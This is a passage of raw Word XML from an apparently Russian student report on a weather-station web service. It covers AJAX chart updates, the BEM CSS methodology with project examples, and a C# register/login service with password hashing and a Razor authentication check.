        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC3C0A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">инструкций. Запрос передаётся в соответствующий метод, который вызывает другой метод, который возвращает значение из базы данных с отфильтрованными данными, это возвращаемое значение передается обратно в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00617604">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файл, в параметры метода, который вызывается при успешном выполнении вышеописанного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00617604">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>запроса, и в конечном итоге в этом методе обрабатываются данные из параметра для обновления или отрисовки графиков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C56689" w14:textId="3DA3ACE2" w:rsidR="001F4989" w:rsidRPr="001F4989" w:rsidRDefault="001F4989" w:rsidP="001F4989">
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">Для обеспечения удобства расширения и переработки пользовательского интерфейса в </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve"> в проекте используется методология «БЭМ»</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>[19]</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>. БЭМ (Блок, элемент, модификатор) – это компонентный подход к веб</w:t>
      </w:r>
      <w:r w:rsidR="00332DCA">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>разработке. В его основе лежит принцип разделения интерфейса на независимые блоки. Он позволяет легко и быстро разрабатывать интерфейсы любой сложности и повторно использовать существующий код, избегая «</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copy</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paste</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FB64E4" w14:textId="77777777" w:rsidR="001F4989" w:rsidRPr="001F4989" w:rsidRDefault="001F4989" w:rsidP="001F4989">
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">Блок – функционально независимый компонент страницы, который может быть повторно использован. Название блока характеризует смысл («что это?» - «меню»: (класс </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>menu</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">), «кнопка»: (класс </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">). Таким образом обеспечивается независимость, при которой возможно повторное </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:lastRenderedPageBreak/>
        <w:t>использование или перенос блоков с места на место. Допустима любая вложенность блоков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A77D7" w14:textId="77777777" w:rsidR="001F4989" w:rsidRPr="001F4989" w:rsidRDefault="001F4989" w:rsidP="001F4989">
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">Элемент – составная часть блока, которая не может использоваться в отрыве от него. Название элемента характеризует смысл («что это?» - «текст»: (класс </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">), «пункт»: (класс </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>item</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>). Структура элемента соответствует схеме: имя-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F4989">
        <w:t>блока__имя</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F4989">
        <w:t>-элемента. Имя элемента обязательно следует отделять двумя знаками подчёркивания, также рекомендуется в качестве пробелов между словами использовать символ дефиса. Элементы можно вкладывать друг в друга, но элемент должен быть всегда частью блока и не должен использоваться отдельно от него.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B433FE" w14:textId="6C9043D2" w:rsidR="001F4989" w:rsidRDefault="001F4989" w:rsidP="001F4989">
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">Модификатор – сущность, определяющая внешний вид, состояние или поведение блока либо элемента. Название модификатора характеризует внешний вид («какой размер?» - «маленький»: (класс </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>small</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">), «какого цвета?»: (класс </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>red</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">). Имя модификатора отделяется от элемента двумя знаками подчёркивания. Например, если требуется сделать кнопку (блок) с текстом (элемент) в неактивном состоянии (модификатор) по нотации БЭМ имя класса будет следующим: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>__</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disabled</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7586BE54" w14:textId="430C04EA" w:rsidR="00485415" w:rsidRDefault="000F569D" w:rsidP="001F4989">
      <w:r>
        <w:t>Следует продемонстрировать как была применена методология БЭМ в разрабатываемом веб сервисе:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F256AE9" w14:textId="2EA9A055" w:rsidR="000F569D" w:rsidRDefault="000F569D" w:rsidP="001F4989">
      <w:r>
        <w:t>Рассмотрим главную страницу приложения, смысловой блок «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>отвечающий за базовые стили всех</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>форм для графиков, внутри которого находится блок «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t>__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>radio</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>определяющий стили для кнопок отображения данных на графике за 1 день, или за 3 дня. Внутри «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t>__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>radio</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>находится стиль именно для кнопки – «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t>__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>radio</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blue</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>определяя стили конкретно для синей кнопки, использование модификатора «</w:t>
      </w:r>
      <w:r w:rsidRPr="000F569D">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blue</w:t>
      </w:r>
      <w:r>
        <w:t>» необходимо, если в дальнейшем будет необходимо поменять стиль кнопки на другой цвет, или сделать у всех кнопок разные цвета.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C78A8F8" w14:textId="7CE1A7AD" w:rsidR="000F569D" w:rsidRPr="00115C66" w:rsidRDefault="000F569D" w:rsidP="001F4989">
      <w:r>
        <w:t>Таким</w:t>
      </w:r>
      <w:r w:rsidRPr="00115C66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>образом</w:t>
      </w:r>
      <w:r w:rsidRPr="00115C66">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r w:rsidRPr="00115C66">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>radio</w:t>
      </w:r>
      <w:r w:rsidRPr="00115C66">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r w:rsidRPr="00115C66">
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00115C66">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidR="00115C66">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r w:rsidR="00115C66" w:rsidRPr="00115C66">
        <w:t>__</w:t>
      </w:r>
      <w:r w:rsidR="00115C66">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>radio</w:t>
      </w:r>
      <w:r w:rsidR="00115C66" w:rsidRPr="00115C66">
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00115C66">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blue</w:t>
      </w:r>
      <w:r w:rsidRPr="00115C66">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00115C66" w:rsidRPr="00115C66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00115C66">
        <w:t>являются дочерними блоками родительского блока «</w:t>
      </w:r>
      <w:r w:rsidR="00115C66">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form</w:t>
      </w:r>
      <w:r w:rsidR="00115C66">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433B7CA7" w14:textId="50B3DA4D" w:rsidR="001F4989" w:rsidRDefault="001F4989" w:rsidP="001F4989">
      <w:r w:rsidRPr="001F4989">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Методология БЭМ является общепринятой в среде веб-разработчиков, также для тех, кто не знаком с ней всё равно будет более понятнее ориентироваться в разметке, чем в ситуации с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F4989">
        <w:t>неструктурированно</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve"> названными классами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D505867" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00617604">
      <w:r>
        <w:t>Также в приложении присутствует механизм авторизации и аутентификации. Данный функционал мотивирован тем, что только авторизованным пользователям можно выдавать права на скачивание информации метеостанции и влагомеров в табличном виде себе на компьютер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5C5DE2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00617604">
      <w:r>
        <w:t>Аутентификация – это установление личности пользователя, а авторизация – выдача прав. Чтобы выдать права какому – либо пользователю необходимо выяснить, кем он является? Как минимум из-за того, что в приложении нужно разделять роли администраторов и обычных пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A6153" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00617604">
      <w:r>
        <w:t xml:space="preserve">Для реализации алгоритма аутентификации и авторизации необходимо создать интерфейс, в котором будет описаны возможности пользователей. Такой интерфейс описан в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>IAccountService.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC465CC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>IAccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C82293C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874D2BD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    Task&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>BaseResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ClaimsIdentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Register(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>RegisterViewModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> model);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C584E3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    Task&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>BaseResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ClaimsIdentity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Login(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>LoginViewModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> model);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7887C557" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA8262" w14:textId="049A76B4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:r>
        <w:t xml:space="preserve">В приложении можно выполнить всего две функции – зарегистрироваться и войти. Регистрация нужна для создания новых пользователей с обычными правами (администраторы создаются </w:t>
      </w:r>
      <w:r w:rsidR="00332DCA">
        <w:t>напрямую в базе данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), а функционал входа нужен для распознания пользователя и в зависимости от его роли отобразить новый контент на сайте. Реализация методов интерфейса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>IAccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">находится в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>AccountService.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и предоставлена в Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Б</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Также стоит отметить, что при создании и авторизации пользователей используется метод </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>HashPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">который </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">находится в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>HashPassword.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Данный метод шифрует пароли пользователей по алгоритму </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SHA</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>в БД хранятся зашифрованные пароли и при входе программа проверяет хэш введённого пользователем пароля с хэшем из базы данных, который хранится в поле «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Контроллер </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>AccountController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">использует функции из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>AccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и вызывает представления </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Login.cshtml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Register.cshtml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Проверка на то, авторизован пользователь или нет определяется кодом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758B31C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000D7299" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000D7299">
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D7299">
        <w:t>User.Identity.IsAuthenticated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D7299">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DBF3EB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000D7299" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000D7299">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6129416E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000D7299" w:rsidRDefault="0093378B" w:rsidP="000D7299">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="download-data-button sample-button"</w:t>
      </w:r>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D7299">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>="#"&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Скачать</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D7299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>базу</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
